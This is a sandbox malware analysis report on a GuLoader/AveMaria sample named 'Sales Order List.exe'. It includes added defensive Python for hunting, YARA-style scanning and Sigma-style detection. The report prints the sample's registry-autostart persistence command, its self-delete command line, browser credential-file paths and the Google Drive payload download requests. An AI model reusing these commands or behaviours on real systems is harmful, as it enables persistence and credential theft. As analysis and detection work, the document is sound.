Windows Analysis Report Sales Order List.exe

Overview

General Information

Sample Name: Sales Order List.exe
Analysis ID: 526595
MD5: 80bad0903ee7ec98805678673720cfd9
SHA1: 35aecf6fe3ac24adaf16c04b787e90ac4c845eb0
SHA256: 260e6b75d7616efd29c05151f1ce95bbab1aaf8703f86f62c4d9bc6d308a56b8
Detection

GuLoader, AveMaria
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Yara detected Generic Dropper
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected AveMaria stealer
GuLoader behavior detected
Multi AV Scanner detection for dropped file
Yara detected GuLoader
Hides threads from debuggers
Initial sample is a PE file and has a suspicious name
Writes to foreign memory regions
Tries to detect Any.run
Increases the number of concurrent connection per server for Internet Explorer
Contains functionality to hide user accounts
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Allocates memory in foreign processes
Injects code into the Windows Explorer (explorer.exe)
Creates an undocumented autostart registry key
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Drops PE files to the application program directory (C:\ProgramData)
One or more processes crash
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Sigma detected: Direct Autorun Keys Modification
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Abnormal high CPU Usage
Creates a DirectInput object (often for capturing keystrokes)
AV process strings found (often used to terminate AV products)
Installs a raw input device (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Contains functionality to detect virtual machines (SLDT)
Uses reg.exe to modify the Windows registry
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Process Tree

  • System is w10x64native
  • Sales Order List.exe (PID: 5788 cmdline: "C:\Users\user\Desktop\Sales Order List.exe" MD5: 80BAD0903EE7EC98805678673720CFD9)
    • Sales Order List.exe (PID: 6892 cmdline: "C:\Users\user\Desktop\Sales Order List.exe" MD5: 80BAD0903EE7EC98805678673720CFD9)
      • explorer.exe (PID: 4576 cmdline: C:\Windows\Explorer.EXE MD5: 5EA66FF5AE5612F921BC9DA23BAC95F7)
      • cmd.exe (PID: 6232 cmdline: cmd.exe /c REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\images.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 4528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • reg.exe (PID: 4904 cmdline: REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\images.exe" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • images.exe (PID: 4192 cmdline: C:\ProgramData\images.exe MD5: 80BAD0903EE7EC98805678673720CFD9)
        • WerFault.exe (PID: 4220 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4192 -s 740 MD5: 40A149513D721F096DDF50C04DA2F01F)
        • WerFault.exe (PID: 3440 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4192 -s 772 MD5: 40A149513D721F096DDF50C04DA2F01F)
  • cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "https://drive.google.com/uc?export=downloads;R"}
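The extracted configuration only gives the Google Drive direct-download URL. The Networking section of this report shows what the loader actually sent: a GET to drive.google.com/uc?export=download&id=... followed by the signed doc-0k-48-docs.googleusercontent.com redirect, both carrying an Internet Explorer 11 / Windows 7 User-Agent (Windows NT 6.1) although the analysis host is w10x64native. The Python below is an added example, not part of the Joe Sandbox report or of any GuLoader tooling: it parses raw HTTP requests of that shape, extracts the Drive file id from either URL form, and flags the User-Agent/host-OS mismatch. The requests are constructed copies of the two lines in this report plus one made-up benign browser request; the mismatch check and the "10.0" host version are assumptions about how a hunter would apply this to proxy logs.

```python
"""Added example, not from the Joe Sandbox report: turn captured HTTP requests
of the kind this sample issued into hunt-ready Google Drive indicators."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional
from urllib.parse import parse_qs

# Drive file ids are long URL-safe tokens; the minimum length is an assumption.
DRIVE_ID = re.compile(r"^[A-Za-z0-9_-]{20,}$")


@dataclass
class Request:
    method: str
    target: str
    host: str
    user_agent: str
    headers: Dict[str, str]


def parse_request(raw: str) -> Request:
    """Parse a raw HTTP/1.x request: request line plus CRLF-separated headers."""
    lines = raw.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return Request(method, target, headers.get("host", ""),
                   headers.get("user-agent", ""), headers)


def drive_file_id(host: str, target: str) -> Optional[str]:
    """Return the Drive file id when (host, target) is a direct-download fetch.

    Two shapes are recognised: the initial /uc?export=download&id=<id> request
    on drive.google.com and the signed /docs/securesc/.../<id>?e=download
    redirect target on *.googleusercontent.com (id is the last path element).
    """
    path, _, query = target.partition("?")
    params = parse_qs(query)
    if host == "drive.google.com" and path == "/uc" \
            and params.get("export", [""])[0] == "download":
        fid = params.get("id", [""])[0]
        return fid if DRIVE_ID.match(fid) else None
    if host.endswith(".googleusercontent.com") and path.startswith("/docs/securesc/"):
        fid = path.rstrip("/").rsplit("/", 1)[-1]
        return fid if DRIVE_ID.match(fid) else None
    return None


def ua_os_mismatch(user_agent: str, host_nt_version: str) -> bool:
    """True when the UA claims a Windows NT version other than the host's own."""
    m = re.search(r"Windows NT (\d+\.\d+)", user_agent)
    return bool(m) and m.group(1) != host_nt_version


def assess(raw_requests: List[str], host_nt_version: str = "10.0") -> List[Dict[str, object]]:
    """One finding per Drive direct-download request, with the hunt flags set."""
    findings: List[Dict[str, object]] = []
    for raw in raw_requests:
        req = parse_request(raw)
        fid = drive_file_id(req.host, req.target)
        if fid is None:
            continue
        findings.append({
            "host": req.host,
            "file_id": fid,
            "user_agent": req.user_agent,
            "ua_mismatch": ua_os_mismatch(req.user_agent, host_nt_version),
            "no_cache": req.headers.get("cache-control", "").lower() == "no-cache",
        })
    return findings


# Constructed input: the first two are copies of the requests in this report,
# the third is a made-up benign browser request that must not be flagged.
SAMPLE_REQUESTS = [
    "GET /uc?export=download&id=14riMs-By6HjEY7hTtEKf9cx7RhIUcVvn HTTP/1.1\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\r\n"
    "Host: drive.google.com\r\nCache-Control: no-cache\r\n",
    "GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/145unl5irik8qdpdmfh83ttj403osrln"
    "/1637606400000/11605847516605788748/*/14riMs-By6HjEY7hTtEKf9cx7RhIUcVvn?e=download HTTP/1.1\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\r\n"
    "Cache-Control: no-cache\r\nHost: doc-0k-48-docs.googleusercontent.com\r\nConnection: Keep-Alive\r\n",
    "GET / HTTP/1.1\r\nHost: drive.google.com\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0 Safari/537.36\r\n",
]

if __name__ == "__main__":
    for finding in assess(SAMPLE_REQUESTS):
        print(finding)
```

Both Drive URL shapes resolve to the same file id, so a hunt keyed on the id catches the second-stage fetch even where only the googleusercontent.com leg made it into the proxy log; the UA mismatch and the explicit Cache-Control: no-cache are supporting signals, not proof on their own.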

Yara Overview

Memory Dumps

Source | Rule | Description | Author
00000002.00000002.125547203981.00000000022E0000.00000040.00000001.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security
0000000F.00000000.125996962988.0000000002330000.00000040.00000001.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security
0000000F.00000000.125886367131.0000000002330000.00000040.00000001.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security
00000004.00000000.125545111088.0000000001660000.00000040.00000001.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security
0000000F.00000000.125990940523.0000000002330000.00000040.00000001.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security
(14 further entries not shown)

            Unpacked PEs

Source | Rule | Description | Author (matched strings listed beneath each row as offset:$identifier: string)
4.3.Sales Order List.exe.18f3e10.3.raw.unpack | MAL_Envrial_Jan18_1 | Detects Encrial credential stealer malware | Florian Roth
  • 0x3100:$a1: \Opera Software\Opera Stable\Login Data
  • 0x3428:$a2: \Comodo\Dragon\User Data\Default\Login Data
  • 0x2d70:$a3: \Google\Chrome\User Data\Default\Login Data
4.3.Sales Order List.exe.18f3e10.3.raw.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
4.3.Sales Order List.exe.18f3e10.3.raw.unpack | JoeSecurity_AveMaria | Yara detected AveMaria stealer | Joe Security
4.3.Sales Order List.exe.18f3e10.3.raw.unpack | AveMaria_WarZone | unknown | unknown
  • 0x51a8:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q
  • 0x4efc:$str2: MsgBox.exe
  • 0x4dd0:$str6: Ave_Maria
  • 0x4470:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
  • 0x3a90:$str8: SMTP Password
  • 0x2d70:$str11: \Google\Chrome\User Data\Default\Login Data
  • 0x4448:$str12: \sqlmap.dll
4.3.Sales Order List.exe.18f3e10.7.raw.unpack | MAL_Envrial_Jan18_1 | Detects Encrial credential stealer malware | Florian Roth
  • 0x3100:$a1: \Opera Software\Opera Stable\Login Data
  • 0x3428:$a2: \Comodo\Dragon\User Data\Default\Login Data
  • 0x2d70:$a3: \Google\Chrome\User Data\Default\Login Data
(3 further entries not shown)
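The rule hits above are reported as offset:$identifier: string. The Python below is an added example, not code from the report or from the rule authors: it performs the same kind of scan in miniature, looking for both the ascii and the wide (UTF-16LE) encoding of a handful of the strings listed above, returning their offsets, and applying a YARA-style "N of them" condition. YARA rules mark such strings ascii wide because the same text can sit UTF-16 encoded in memory, where an ascii-only scan misses it. The buffer scanned here is constructed: the ascii strings are placed at the offsets the report shows plus one UTF-16LE copy of Ave_Maria; it is not the unpacked sample, and yara-python is the right tool for real scans.

```python
"""Added example, not from the Joe Sandbox report: a minimal YARA-style
string scan (ascii + wide) over a constructed buffer, with an 'N of them'
condition.  Not a replacement for yara-python."""
import re
from typing import Dict, List, Tuple

# A subset of the strings the AveMaria_WarZone / MAL_Envrial_Jan18_1 rules
# matched in this report, keyed by the identifiers the report shows.
STRINGS: Dict[str, str] = {
    "$a1":   r"\Opera Software\Opera Stable\Login Data",
    "$a3":   r"\Google\Chrome\User Data\Default\Login Data",
    "$str1": r"cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q",
    "$str6": r"Ave_Maria",
    "$str7": r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList",
    "$str8": r"SMTP Password",
}


def encodings(text: str) -> Dict[str, bytes]:
    """The two byte forms YARA's 'ascii wide' modifier searches for."""
    return {"ascii": text.encode("ascii"), "wide": text.encode("utf-16-le")}


def scan(buf: bytes, strings: Dict[str, str] = STRINGS) -> Dict[str, List[Tuple[int, str]]]:
    """Map each identifier to the (offset, encoding) pairs where it occurs."""
    hits: Dict[str, List[Tuple[int, str]]] = {}
    for ident, text in strings.items():
        for kind, needle in encodings(text).items():
            for m in re.finditer(re.escape(needle), buf):
                hits.setdefault(ident, []).append((m.start(), kind))
    return hits


def n_of_them(hits: Dict[str, List[Tuple[int, str]]], n: int) -> bool:
    """YARA's 'n of them': at least n distinct identifiers matched."""
    return len(hits) >= n


def format_hits(hits: Dict[str, List[Tuple[int, str]]]) -> List[str]:
    """Render hits the way the report lists them: offset:$id (encoding)."""
    return [f"{off:#06x}:{ident} ({kind})"
            for ident, occurrences in hits.items() for off, kind in occurrences]


def build_sample() -> bytes:
    """Constructed buffer, not the real unpacked PE: ascii strings at the
    offsets the report shows, plus a UTF-16LE copy of Ave_Maria at 0x5800."""
    buf = bytearray(0x6000)

    def put(offset: int, data: bytes) -> None:
        buf[offset:offset + len(data)] = data

    put(0x2d70, STRINGS["$a3"].encode("ascii"))
    put(0x3100, STRINGS["$a1"].encode("ascii"))
    put(0x3a90, STRINGS["$str8"].encode("ascii"))
    put(0x4dd0, STRINGS["$str6"].encode("ascii"))
    put(0x51a8, STRINGS["$str1"].encode("ascii"))
    put(0x5800, STRINGS["$str6"].encode("utf-16-le"))   # the 'wide' case
    return bytes(buf)


if __name__ == "__main__":
    found = scan(build_sample())
    for line in format_hits(found):
        print(line)
    print("3 of them:", n_of_them(found, 3))
```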

                Sigma Overview

System Summary:

Sigma detected: Direct Autorun Keys Modification
Source: Process started | Author: Victor Sergeev, Daniil Yugoslavskiy, oscd.community
Data:
  Command: REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\images.exe"
  CommandLine: REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\images.exe"
  CommandLine|base64offset|contains: DA
  Image: C:\Windows\SysWOW64\reg.exe
  NewProcessName: C:\Windows\SysWOW64\reg.exe
  OriginalFileName: C:\Windows\SysWOW64\reg.exe
  ParentCommandLine: cmd.exe /c REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\images.exe"
  ParentImage: C:\Windows\SysWOW64\cmd.exe
  ParentProcessId: 6232
  ProcessCommandLine: REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\images.exe"
  ProcessId: 4904
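The Sigma match above keys on reg.exe being launched with "add" and an autostart key path in its command line. Here the key is HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows with the value name Load, which is executed at user logon and is watched far less often than the Run keys (the report's own signature list calls it an undocumented autostart key); /f suppresses the overwrite prompt, and the data points at the dropped copy in C:\ProgramData. The Python below is an added example, not code from the report, from Joe Sandbox or from the oscd.community rule: it re-implements that selection over constructed process-creation events modelled on the process tree, parsing the command line properly so the alert carries key, value name, type and data rather than only a substring hit. The AUTORUN_KEYS list is an assumption (a subset of what the real rule enumerates), and the two benign events are made up.

```python
"""Added example, not from the Joe Sandbox report: Sigma-style detection of
reg.exe writes to autostart keys, run over constructed process-creation
events modelled on this report's process tree."""
import re
from typing import Dict, Iterable, List, Optional

_TOKEN = re.compile(r'"([^"]*)"|(\S+)')

# Lower-cased registry paths treated as autostart locations.  Assumption: a
# subset chosen to cover this sample's key; the real Sigma rule lists more.
AUTORUN_KEYS = (
    r"\software\microsoft\windows\currentversion\run",
    r"\software\microsoft\windows\currentversion\runonce",
    r"\software\microsoft\windows\currentversion\explorer\shell folders",
    r"\software\microsoft\windows\currentversion\explorer\user shell folders",
    r"\software\microsoft\windows nt\currentversion\windows",    # Load / Run values
    r"\software\microsoft\windows nt\currentversion\winlogon",
    r"\system\currentcontrolset\control\session manager",
)


def _tokens(cmdline: str) -> List[str]:
    """Split a Windows command line, honouring double quotes (quotes stripped)."""
    return [quoted or bare for quoted, bare in _TOKEN.findall(cmdline)]


def parse_reg_add(cmdline: str) -> Optional[Dict[str, Optional[str]]]:
    """Return {key, value, type, data} for a 'reg add' command line, else None."""
    toks = _tokens(cmdline)
    if len(toks) < 3:
        return None
    exe = toks[0].lower().rsplit("\\", 1)[-1]
    if exe not in ("reg", "reg.exe") or toks[1].lower() != "add":
        return None
    parsed: Dict[str, Optional[str]] = {"key": toks[2], "value": None, "type": None, "data": None}
    names = {"/v": "value", "/t": "type", "/d": "data"}
    i = 3
    while i < len(toks):
        flag = toks[i].lower()
        if flag in names and i + 1 < len(toks):
            parsed[names[flag]] = toks[i + 1]
            i += 2
        elif flag == "/ve":          # write to the key's (Default) value
            parsed["value"] = ""
            i += 1
        else:                        # /f, /s, /reg:32 ... carry nothing we need
            i += 1
    return parsed


def detect_autorun_reg_add(events: Iterable[Dict[str, object]]) -> List[Dict[str, object]]:
    """Alert when reg.exe adds a value under an autostart key."""
    alerts: List[Dict[str, object]] = []
    for ev in events:
        image = str(ev.get("Image", ""))
        if not image.lower().endswith("\\reg.exe"):
            continue
        parsed = parse_reg_add(str(ev.get("CommandLine", "")))
        if parsed is None or not parsed["key"]:
            continue
        key_l = str(parsed["key"]).lower()
        if any(k in key_l for k in AUTORUN_KEYS):
            alerts.append({"ProcessId": ev.get("ProcessId"),
                           "ParentCommandLine": ev.get("ParentCommandLine"),
                           **parsed})
    return alerts


# Constructed events: the first mirrors the reg.exe launch in this report's
# process tree (PID 4904); the other two are made-up benign activity.
SAMPLE_EVENTS: List[Dict[str, object]] = [
    {"ProcessId": 4904,
     "Image": r"C:\Windows\SysWOW64\reg.exe",
     "CommandLine": r'REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\images.exe"',
     "ParentCommandLine": r'cmd.exe /c REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\images.exe"'},
    {"ProcessId": 1001,   # a query, not a write
     "Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r'reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Run"',
     "ParentCommandLine": "cmd.exe"},
    {"ProcessId": 1002,   # a write, but not to an autostart key
     "Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r'reg add "HKCU\Software\Contoso\App" /v Theme /t REG_SZ /d dark /f',
     "ParentCommandLine": "cmd.exe"},
]

if __name__ == "__main__":
    for alert in detect_autorun_reg_add(SAMPLE_EVENTS):
        print(alert)
```

Parsing the value name and data rather than substring-matching the whole command line is what lets the alert say "Load -> C:\ProgramData\images.exe" directly; an analyst can then pivot on the dropped path without re-reading the raw command line, and a benign reg query on the same key does not fire.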

                Jbx Signature Overview


AV Detection:

Found malware configuration
Source: 00000002.00000002.125547203981.00000000022E0000.00000040.00000001.sdmp | Malware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=downloads;R"}
Multi AV Scanner detection for submitted file
Source: Sales Order List.exe | ReversingLabs: Detection: 40%
Yara detected AveMaria stealer
Source: Yara match | File source: 4.3.Sales Order List.exe.18f3e10.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.3.Sales Order List.exe.18f3e10.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000003.125765591469.00000000018A8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.125766752022.00000000018F2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.125766920138.00000000018F6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.125766406921.00000000018A8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.125766059758.00000000018F2000.00000004.00000001.sdmp, type: MEMORY
Multi AV Scanner detection for dropped file
Source: C:\ProgramData\images.exe | ReversingLabs: Detection: 40%
Source: 4.3.Sales Order List.exe.18f3e10.7.unpack | Avira: Label: TR/Crypt.XPACK.Gen2
Source: 4.3.Sales Order List.exe.18f3e10.3.unpack | Avira: Label: TR/Crypt.XPACK.Gen2
Source: Sales Order List.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: unknown | HTTPS traffic detected: 142.250.186.46:443 -> 192.168.11.20:49806 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 142.250.185.161:443 -> 192.168.11.20:49807 version: TLS 1.2
Source: C:\Users\user\Desktop\Sales Order List.exe | Directory created: C:\Program Files\Microsoft DN1
                Source: Binary string: WinTypes.pdb source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126024539923.00000000068B8000.00000004.00000001.sdmp
                Source: Binary string: Kernel.Appcore.pdb( source: WerFault.exe, 00000014.00000003.125904782894.0000000005CEB000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126018047691.0000000006475000.00000004.00000001.sdmp
                Source: Binary string: wgdi32full.pdb( source: WerFault.exe, 00000014.00000003.125904003059.0000000002DFC000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126008791375.00000000033D5000.00000004.00000001.sdmp
                Source: Binary string: coml2.pdb6H&8e source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp
                Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000014.00000003.125899753643.0000000002D6E000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126009250720.000000000334B000.00000004.00000001.sdmp
                Source: Binary string: ntmarta.pdb( source: WerFault.exe, 00000014.00000003.125910819500.0000000005D29000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126023579033.00000000068B2000.00000004.00000001.sdmp
                Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126008890066.00000000033E0000.00000004.00000001.sdmp
                Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000014.00000003.125905933053.0000000005C3F000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126033336482.0000000005528000.00000004.00000040.sdmp
                Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126013564666.00000000033F7000.00000004.00000001.sdmp
                Source: Binary string: wntdll.pdb source: WerFault.exe, 00000014.00000003.125899753643.0000000002D6E000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126033173702.0000000005431000.00000004.00000001.sdmp
                Source: Binary string: shcore.pdb$H48s source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp
                Source: Binary string: CoreMessaging.pdb source: WerFault.exe, 00000014.00000003.125913249873.0000000005D18000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126017165802.000000000649F000.00000004.00000001.sdmp
                Source: Binary string: shcore.pdb source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126033336482.0000000005528000.00000004.00000040.sdmp
                Source: Binary string: apphelp.pdb( source: WerFault.exe, 00000014.00000003.125903738538.0000000002D80000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126009354250.0000000003358000.00000004.00000001.sdmp
                Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000014.00000003.125905520713.0000000002DF6000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126033269253.0000000005520000.00000004.00000040.sdmp
                Source: Binary string: oleaut32.pdb( source: WerFault.exe, 00000014.00000003.125909078051.0000000005CE0000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126012936139.000000000646A000.00000004.00000001.sdmp
                Source: Binary string: advapi32.pdb source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126010636897.00000000033E6000.00000004.00000001.sdmp
                Source: Binary string: ucrtbase.pdb( source: WerFault.exe, 00000014.00000003.125905831080.0000000005C34000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126008890066.00000000033E0000.00000004.00000001.sdmp
                Source: Binary string: ntmarta.pdb source: WerFault.exe, 00000014.00000003.125910819500.0000000005D29000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126023579033.00000000068B2000.00000004.00000001.sdmp
                Source: Binary string: coml2.pdb( source: WerFault.exe, 00000017.00000003.126018806279.000000000648C000.00000004.00000001.sdmp
                Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126008843786.00000000033DB000.00000004.00000001.sdmp
                Source: Binary string: wimm32.pdb( source: WerFault.exe, 00000014.00000003.125904733671.0000000005CE6000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126016753163.0000000006470000.00000004.00000001.sdmp
                Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000014.00000003.125900100057.0000000002D6E000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126009302903.0000000003351000.00000004.00000001.sdmp
                Source: Binary string: wimm32.pdb source: WerFault.exe, 00000014.00000003.125904733671.0000000005CE6000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126016753163.0000000006470000.00000004.00000001.sdmp
                Source: Binary string: CoreUIComponents.pdb source: WerFault.exe, 00000014.00000003.125915266650.0000000005D13000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126022235396.0000000006499000.00000004.00000001.sdmp
                Source: Binary string: TextShaping.pdb source: WerFault.exe, 00000014.00000003.125917002362.0000000006562000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126009302903.0000000003351000.00000004.00000001.sdmp
                Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000014.00000003.125927969397.0000000005260000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126008696474.00000000033CA000.00000004.00000001.sdmp
                Source: Binary string: oleaut32.pdbQ source: WerFault.exe, 00000017.00000003.126033336482.0000000005528000.00000004.00000040.sdmp
                Source: Binary string: CoreMessaging.pdb( source: WerFault.exe, 00000014.00000003.125913249873.0000000005D18000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126017165802.000000000649F000.00000004.00000001.sdmp
                Source: Binary string: sxs.pdb source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126033336482.0000000005528000.00000004.00000040.sdmp
                Source: Binary string: bcryptprimitives.pdb( source: WerFault.exe, 00000014.00000003.125909199577.0000000005CF1000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126016848001.000000000647B000.00000004.00000001.sdmp
                Source: Binary string: wUxTheme.pdb source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126019837993.000000000613C000.00000004.00000001.sdmp
                Source: Binary string: sechost.pdb( source: WerFault.exe, 00000014.00000003.125905988617.0000000005C45000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126010047688.00000000033F1000.00000004.00000001.sdmp
                Source: Binary string: combase.pdb( source: WerFault.exe, 00000014.00000003.125907854720.0000000002E1D000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126010408748.00000000060E2000.00000004.00000001.sdmp
                Source: Binary string: CoreUIComponents.pdb( source: WerFault.exe, 00000014.00000003.125915266650.0000000005D13000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126022235396.0000000006499000.00000004.00000001.sdmp
                Source: Binary string: wntdll.pdb( source: WerFault.exe, 00000014.00000003.125899753643.0000000002D6E000.00000004.00000001.sdmp
                Source: Binary string: msvcrt.pdb( source: WerFault.exe, 00000014.00000003.125905933053.0000000005C3F000.00000004.00000001.sdmp
                Source: Binary string: ws2_32.pdb source: WerFault.exe, 00000014.00000003.125917746027.0000000005D1E000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126033336482.0000000005528000.00000004.00000040.sdmp
                Source: Binary string: advapi32.pdb( source: WerFault.exe, 00000014.00000003.125907125589.0000000005C3A000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126010636897.00000000033E6000.00000004.00000001.sdmp
                Source: Binary string: coml2.pdb source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126018806279.000000000648C000.00000004.00000001.sdmp
                Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126008791375.00000000033D5000.00000004.00000001.sdmp
                Source: Binary string: WinTypes.pdb( source: WerFault.exe, 00000017.00000003.126024539923.00000000068B8000.00000004.00000001.sdmp
                Source: Binary string: sechost.pdb source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126010047688.00000000033F1000.00000004.00000001.sdmp
                Source: Binary string: ws2_32.pdb8H 8 source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp
                Source: Binary string: wrpcrt4.pdb( source: WerFault.exe, 00000017.00000003.126013564666.00000000033F7000.00000004.00000001.sdmp
                Source: Binary string: msctf.pdb source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126021040208.0000000006486000.00000004.00000001.sdmp
                Source: Binary string: ,wntdll.pdb source: WerFault.exe, 00000014.00000003.125899412774.0000000002D70000.00000004.00000001.sdmp
                Source: Binary string: wwin32u.pdb( source: WerFault.exe, 00000017.00000003.126008696474.00000000033CA000.00000004.00000001.sdmp
